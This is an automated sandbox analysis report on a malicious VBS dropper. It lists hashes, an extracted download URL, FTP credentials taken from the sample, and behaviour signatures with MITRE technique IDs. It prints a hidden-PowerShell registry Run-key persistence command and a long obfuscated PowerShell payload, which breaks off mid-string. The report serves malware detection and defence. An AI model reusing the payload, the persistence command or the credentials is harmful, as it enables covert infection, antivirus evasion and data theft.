84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c

Analysis

max time kernel
145s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 08:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs
Size

683KB
MD5

89af3d1c013508a4c303b662082b37b5
SHA1

27c09a549b4aa399d03440fc543fc72cea662231
SHA256

84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c
SHA512

716a5bf5a788d976138dac3c7b7eb968fb4c20ec06bf45e2d0dfc99aa4f1594eb067285c2c0597999876067951627722634cc9fc243a3736e535a13c385569f6
SSDEEP

1536:4vvvvvvvvvvvvvvvvvvvvvvvL88888888888888888888888888888888888888R:fvE

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 47 IoCs

flow	pid	Process
12	2432	powershell.exe
16	2432	powershell.exe
18	2432	powershell.exe
20	2432	powershell.exe
22	2432	powershell.exe
29	2432	powershell.exe
31	2432	powershell.exe
32	2432	powershell.exe
33	2432	powershell.exe
34	2432	powershell.exe
35	2432	powershell.exe
48	2432	powershell.exe
49	2432	powershell.exe
51	2432	powershell.exe
52	2432	powershell.exe
53	2432	powershell.exe
54	2432	powershell.exe
55	2432	powershell.exe
56	2432	powershell.exe
57	2432	powershell.exe
58	2432	powershell.exe
61	2432	powershell.exe
62	2432	powershell.exe
63	2432	powershell.exe
64	2432	powershell.exe
65	2432	powershell.exe
66	2432	powershell.exe
67	2432	powershell.exe
68	2432	powershell.exe
70	2432	powershell.exe
71	2432	powershell.exe
75	2432	powershell.exe
76	2432	powershell.exe
77	2432	powershell.exe
78	2432	powershell.exe
79	2432	powershell.exe
80	2432	powershell.exe
81	2432	powershell.exe
82	2432	powershell.exe
83	2432	powershell.exe
84	2432	powershell.exe
85	2432	powershell.exe
87	2432	powershell.exe
88	2432	powershell.exe
89	2432	powershell.exe
90	2432	powershell.exe
91	2432	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3704	powershell.exe
4764	powershell.exe
4176	powershell.exe
3380	powershell.exe
2432	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_zra = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\quvwm.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3380	powershell.exe
3380	powershell.exe
2432	powershell.exe
2432	powershell.exe
2432	powershell.exe
4764	powershell.exe
3704	powershell.exe
3704	powershell.exe
4764	powershell.exe
4176	powershell.exe
4176	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeDebugPrivilege	4176	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3768 wrote to memory of 3380	3768	WScript.exe	82
PID 3768 wrote to memory of 3380	3768	WScript.exe	82
PID 3380 wrote to memory of 2432	3380	powershell.exe	84
PID 3380 wrote to memory of 2432	3380	powershell.exe	84
PID 2432 wrote to memory of 3704	2432	powershell.exe	87
PID 2432 wrote to memory of 3704	2432	powershell.exe	87
PID 2432 wrote to memory of 4764	2432	powershell.exe	88
PID 2432 wrote to memory of 4764	2432	powershell.exe	88
PID 2432 wrote to memory of 4952	2432	powershell.exe	89
PID 2432 wrote to memory of 4952	2432	powershell.exe	89
PID 2432 wrote to memory of 4176	2432	powershell.exe	92
PID 2432 wrote to memory of 4176	2432	powershell.exe	92
PID 2432 wrote to memory of 2388	2432	powershell.exe	93
PID 2432 wrote to memory of 2388	2432	powershell.exe	93
PID 2432 wrote to memory of 4844	2432	powershell.exe	94
PID 2432 wrote to memory of 4844	2432	powershell.exe	94
PID 2432 wrote to memory of 3532	2432	powershell.exe	98
PID 2432 wrote to memory of 3532	2432	powershell.exe	98
PID 2432 wrote to memory of 2572	2432	powershell.exe	99
PID 2432 wrote to memory of 2572	2432	powershell.exe	99
PID 2432 wrote to memory of 2396	2432	powershell.exe	100
PID 2432 wrote to memory of 2396	2432	powershell.exe	100
PID 2432 wrote to memory of 996	2432	powershell.exe	101
PID 2432 wrote to memory of 996	2432	powershell.exe	101
PID 2432 wrote to memory of 4116	2432	powershell.exe	102
PID 2432 wrote to memory of 4116	2432	powershell.exe	102
PID 2432 wrote to memory of 4252	2432	powershell.exe	103
PID 2432 wrote to memory of 4252	2432	powershell.exe	103
PID 2432 wrote to memory of 380	2432	powershell.exe	106
PID 2432 wrote to memory of 380	2432	powershell.exe	106
PID 2432 wrote to memory of 4520	2432	powershell.exe	107
PID 2432 wrote to memory of 4520	2432	powershell.exe	107
PID 2432 wrote to memory of 3596	2432	powershell.exe	108
PID 2432 wrote to memory of 3596	2432	powershell.exe	108
PID 2432 wrote to memory of 3664	2432	powershell.exe	109
PID 2432 wrote to memory of 3664	2432	powershell.exe	109
PID 2432 wrote to memory of 1468	2432	powershell.exe	110
PID 2432 wrote to memory of 1468	2432	powershell.exe	110
PID 2432 wrote to memory of 3092	2432	powershell.exe	111
PID 2432 wrote to memory of 3092	2432	powershell.exe	111
PID 2432 wrote to memory of 804	2432	powershell.exe	112
PID 2432 wrote to memory of 804	2432	powershell.exe	112
PID 2432 wrote to memory of 3504	2432	powershell.exe	113
PID 2432 wrote to memory of 3504	2432	powershell.exe	113
PID 2432 wrote to memory of 100	2432	powershell.exe	114
PID 2432 wrote to memory of 100	2432	powershell.exe	114
PID 2432 wrote to memory of 2996	2432	powershell.exe	115
PID 2432 wrote to memory of 2996	2432	powershell.exe	115
PID 2432 wrote to memory of 4328	2432	powershell.exe	116
PID 2432 wrote to memory of 4328	2432	powershell.exe	116
PID 2432 wrote to memory of 2472	2432	powershell.exe	117
PID 2432 wrote to memory of 2472	2432	powershell.exe	117
PID 2432 wrote to memory of 2852	2432	powershell.exe	118
PID 2432 wrote to memory of 2852	2432	powershell.exe	118
PID 2432 wrote to memory of 2272	2432	powershell.exe	119
PID 2432 wrote to memory of 2272	2432	powershell.exe	119
PID 2432 wrote to memory of 3872	2432	powershell.exe	120
PID 2432 wrote to memory of 3872	2432	powershell.exe	120
PID 2432 wrote to memory of 1648	2432	powershell.exe	121
PID 2432 wrote to memory of 1648	2432	powershell.exe	121
PID 2432 wrote to memory of 4992	2432	powershell.exe	122
PID 2432 wrote to memory of 4992	2432	powershell.exe	122
PID 2432 wrote to memory of 1916	2432	powershell.exe	123
PID 2432 wrote to memory of 1916	2432	powershell.exe	123

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$mpAQs = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉDEШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉaШḆЉB0ШḆЉHQШḆЉcШḆЉBzШḆЉDoШḆЉLwШḆЉvШḆЉHШḆЉШḆЉNwШḆЉuШḆЉHQШḆЉcgШḆЉxШḆЉC4ШḆЉbgШḆЉwШḆЉC4ШḆЉYwBkШḆЉG4ШḆЉLgB6ШḆЉGkШḆЉZwBoШḆЉHQШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉGkШḆЉdШḆЉBlШḆЉG0ШḆЉcwШḆЉvШḆЉHoШḆЉOШḆЉB1ШḆЉFIШḆЉNQBtШḆЉGsШḆЉWШḆЉШḆЉvШḆЉGEШḆЉNgBhШḆЉDYШḆЉNШḆЉBhШḆЉDYШḆЉMwШḆЉtШḆЉDEШḆЉNgШḆЉ4ШḆЉGUШḆЉLQШḆЉ0ШḆЉDMШḆЉMgBkШḆЉC0ШḆЉOШḆЉШḆЉ4ШḆЉDgШḆЉNwШḆЉtШḆЉGIШḆЉOШḆЉШḆЉxШḆЉDIШḆЉYgBiШḆЉDEШḆЉNQШḆЉ1ШḆЉDkШḆЉMgШḆЉyШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉPwByШḆЉGUШḆЉcwBwШḆЉG8ШḆЉbgBzШḆЉGUШḆЉLQBjШḆЉG8ШḆЉbgB0ШḆЉGUШḆЉbgB0ШḆЉC0ШḆЉZШḆЉBpШḆЉHMШḆЉcШḆЉBvШḆЉHMШḆЉaQB0ШḆЉGkШḆЉbwBuШḆЉD0ШḆЉYQB0ШḆЉHQШḆЉYQBjШḆЉGgШḆЉbQBlШḆЉG4ШḆЉdШḆЉШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDMШḆЉRШḆЉШḆЉlШḆЉDIШḆЉMgBpШḆЉG4ШḆЉZwByШḆЉGkШḆЉZШḆЉШḆЉuШḆЉDIШḆЉNgШḆЉuШḆЉDШḆЉШḆЉOШḆЉШḆЉuШḆЉDIШḆЉMШḆЉШḆЉyШḆЉDQШḆЉLgB0ШḆЉHgШḆЉdШḆЉШḆЉlШḆЉDIШḆЉMgШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDIШḆЉQQШḆЉlШḆЉDMШḆЉRШḆЉBVШḆЉFQШḆЉRgШḆЉtШḆЉDgШḆЉJQШḆЉyШḆЉDcШḆЉJQШḆЉyШḆЉDcШḆЉaQBuШḆЉGcШḆЉcgBpШḆЉGQШḆЉLgШḆЉyШḆЉDYШḆЉLgШḆЉwШḆЉDgШḆЉLgШḆЉyШḆЉDШḆЉШḆЉMgШḆЉ0ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉJgBzШḆЉG8ШḆЉdQByШḆЉGMШḆЉZQШḆЉ9ШḆЉGQШḆЉbwB3ШḆЉG4ШḆЉbШḆЉBvШḆЉGEШḆЉZШḆЉШḆЉmШḆЉHYШḆЉPQШḆЉlШḆЉDIШḆЉMgBlШḆЉGUШḆЉNgШḆЉ2ШḆЉDUШḆЉNQШḆЉ3ШḆЉDEШḆЉNШḆЉШḆЉxШḆЉDUШḆЉMwШḆЉyШḆЉGMШḆЉZШḆЉШḆЉ1ШḆЉDQШḆЉOQBiШḆЉDEШḆЉOQBkШḆЉDgШḆЉNШḆЉШḆЉxШḆЉDMШḆЉOШḆЉBlШḆЉDYШḆЉYgШḆЉwШḆЉDgШḆЉJQШḆЉyШḆЉDIШḆЉJwШḆЉgШḆЉCgШḆЉIШḆЉBdШḆЉF0ШḆЉWwB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwBbШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGwШḆЉbШḆЉB1ШḆЉG4ШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZQBrШḆЉG8ШḆЉdgBuШḆЉEkШḆЉLgШḆЉpШḆЉCШḆЉШḆЉJwBJШḆЉFYШḆЉRgByШḆЉHШḆЉШḆЉJwШḆЉgШḆЉCgШḆЉZШḆЉBvШḆЉGgШḆЉdШḆЉBlШḆЉE0ШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCcШḆЉMQBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉLgШḆЉzШḆЉHkШḆЉcgBhШḆЉHIШḆЉYgBpШḆЉEwШḆЉcwBzШḆЉGEШḆЉbШḆЉBDШḆЉCcШḆЉKШḆЉBlШḆЉHШḆЉШḆЉeQBUШḆЉHQШḆЉZQBHШḆЉC4ШḆЉKQШḆЉgШḆЉHgШḆЉbQB6ШḆЉFgШḆЉeШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBkШḆЉGEШḆЉbwBMШḆЉC4ШḆЉbgBpШḆЉGEШḆЉbQBvШḆЉEQШḆЉdШḆЉBuШḆЉGUШḆЉcgByШḆЉHUШḆЉQwШḆЉ6ШḆЉDoШḆЉXQBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉBwШḆЉHШḆЉШḆЉQQШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwШḆЉpШḆЉCШḆЉШḆЉKQШḆЉgШḆЉCcШḆЉQQШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉkyE6ШḆЉJMhJwШḆЉgШḆЉCgШḆЉZQBjШḆЉGEШḆЉbШḆЉBwШḆЉGUШḆЉUgШḆЉuШḆЉGcШḆЉUwB6ШḆЉEMШḆЉQgBsШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBnШḆЉFMШḆЉegBDШḆЉEIШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉFMШḆЉegBDШḆЉEIШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉKШḆЉBlШḆЉHMШḆЉbwBwШḆЉHMШḆЉaQBkШḆЉC4ШḆЉbwBpШḆЉGwШḆЉcwBDШḆЉCQШḆЉOwШḆЉpШḆЉCШḆЉШḆЉJwB0ШḆЉHgШḆЉdШḆЉШḆЉuШḆЉDEШḆЉMШḆЉBMШḆЉEwШḆЉRШḆЉШḆЉvШḆЉDEШḆЉMШḆЉШḆЉvШḆЉHIШḆЉZQB0ШḆЉHШḆЉШḆЉeQByШḆЉGMШḆЉcШḆЉBVШḆЉC8ШḆЉcgBiШḆЉC4ШḆЉbQBvШḆЉGMШḆЉLgB0ШḆЉGEШḆЉcgBiШḆЉHYШḆЉawBjШḆЉHMШḆЉZQBkШḆЉC4ШḆЉcШḆЉB0ШḆЉGYШḆЉQШḆЉШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLwШḆЉvШḆЉDoШḆЉcШḆЉB0ШḆЉGYШḆЉJwШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉbwBpШḆЉGwШḆЉcwBDШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBTШḆЉHoШḆЉQwBCШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉG8ШḆЉaQBsШḆЉHMШḆЉQwШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉGcШḆЉUwB6ШḆЉEMШḆЉQgBsШḆЉCQШḆЉOwШḆЉyШḆЉDEШḆЉcwBsШḆЉFQШḆЉOgШḆЉ6ШḆЉF0ШḆЉZQBwШḆЉHkШḆЉVШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGwШḆЉbwBjШḆЉG8ШḆЉdШḆЉBvШḆЉHIШḆЉUШḆЉB5ШḆЉHQШḆЉaQByШḆЉHUШḆЉYwBlШḆЉFMШḆЉOgШḆЉ6ШḆЉF0ШḆЉcgBlШḆЉGcШḆЉYQBuШḆЉGEШḆЉTQB0ШḆЉG4ШḆЉaQBvШḆЉFШḆЉШḆЉZQBjШḆЉGkШḆЉdgByШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉH0ШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉkШḆЉHsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉawBjШḆЉGEШḆЉYgBsШḆЉGwШḆЉYQBDШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBkШḆЉGkШḆЉbШḆЉBhШḆЉFYШḆЉZQB0ШḆЉGEШḆЉYwBpШḆЉGYШḆЉaQB0ШḆЉHIШḆЉZQBDШḆЉHIШḆЉZQB2ШḆЉHIШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉgШḆЉGYШḆЉLwШḆЉgШḆЉDШḆЉШḆЉIШḆЉB0ШḆЉC8ШḆЉIШḆЉByШḆЉC8ШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉG4ШḆЉdwBvШḆЉGQШḆЉdШḆЉB1ШḆЉGgШḆЉcwШḆЉgШḆЉDsШḆЉJwШḆЉwШḆЉDgШḆЉMQШḆЉgШḆЉHШḆЉШḆЉZQBlШḆЉGwШḆЉcwШḆЉnШḆЉCШḆЉШḆЉZШḆЉBuШḆЉGEШḆЉbQBtШḆЉG8ШḆЉYwШḆЉtШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉDsШḆЉIШḆЉBlШḆЉGMШḆЉcgBvШḆЉGYШḆЉLQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHШḆЉШḆЉdQB0ШḆЉHIШḆЉYQB0ШḆЉFMШḆЉXШḆЉBzШḆЉG0ШḆЉYQByШḆЉGcШḆЉbwByШḆЉFШḆЉШḆЉXШḆЉB1ШḆЉG4ШḆЉZQBNШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwB3ШḆЉG8ШḆЉZШḆЉBuШḆЉGkШḆЉVwBcШḆЉHQШḆЉZgBvШḆЉHMШḆЉbwByШḆЉGMШḆЉaQBNШḆЉFwШḆЉZwBuШḆЉGkШḆЉbQBhШḆЉG8ШḆЉUgBcШḆЉGEШḆЉdШḆЉBhШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBuШḆЉGkШḆЉdШḆЉBzШḆЉGUШḆЉRШḆЉШḆЉtШḆЉCШḆЉШḆЉJwШḆЉlШḆЉEkШḆЉaШḆЉBxШḆЉFIШḆЉWШḆЉШḆЉlШḆЉCcШḆЉIШḆЉBtШḆЉGUШḆЉdШḆЉBJШḆЉC0ШḆЉeQBwШḆЉG8ШḆЉQwШḆЉgШḆЉDsШḆЉIШḆЉB0ШḆЉHIШḆЉYQB0ШḆЉHMШḆЉZQByШḆЉG8ШḆЉbgШḆЉvШḆЉCШḆЉШḆЉdШḆЉBlШḆЉGkШḆЉdQBxШḆЉC8ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGEШḆЉcwB1ШḆЉHcШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGwШḆЉbШḆЉBlШḆЉGgШḆЉcwByШḆЉGUШḆЉdwBvШḆЉHШḆЉШḆЉIШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉcШḆЉBqШḆЉEwШḆЉagBNШḆЉCQШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉOwШḆЉpШḆЉCШḆЉШḆЉZQBtШḆЉGEШḆЉTgByШḆЉGUШḆЉcwBVШḆЉDoШḆЉOgBdШḆЉHQШḆЉbgBlШḆЉG0ШḆЉbgBvШḆЉHIШḆЉaQB2ШḆЉG4ШḆЉRQBbШḆЉCШḆЉШḆЉKwШḆЉgШḆЉCcШḆЉXШḆЉBzШḆЉHIШḆЉZQBzШḆЉFUШḆЉXШḆЉШḆЉ6ШḆЉEMШḆЉJwШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉHUШḆЉcwBtШḆЉC4ШḆЉbgBpШḆЉHcШḆЉcШḆЉBVШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉGoШḆЉTШḆЉBqШḆЉE0ШḆЉJШḆЉШḆЉgШḆЉCwШḆЉQgBLШḆЉEwШḆЉUgBVШḆЉCQШḆЉKШḆЉBlШḆЉGwШḆЉaQBGШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉHcШḆЉSwByШḆЉHUШḆЉdgШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB3ШḆЉEsШḆЉcgB1ШḆЉHYШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉB3ШḆЉEsШḆЉcgB1ШḆЉHYШḆЉJШḆЉШḆЉ7ШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwByШḆЉGcШḆЉOШḆЉBEШḆЉDcШḆЉbwBSШḆЉHMШḆЉZgBWШḆЉGMШḆЉcgШḆЉyШḆЉG4ШḆЉQQBoШḆЉGYШḆЉaШḆЉBWШḆЉDYШḆЉRШḆЉBDШḆЉHgШḆЉUgBxШḆЉG4ШḆЉcQBqШḆЉDUШḆЉagByШḆЉGIШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉUШḆЉBwШḆЉFYШḆЉaQBzШḆЉCQШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉ7ШḆЉCШḆЉШḆЉKQШḆЉnШḆЉHgШḆЉNШḆЉBmШḆЉGgШḆЉWgBNШḆЉHcШḆЉTgШḆЉ3ШḆЉFUШḆ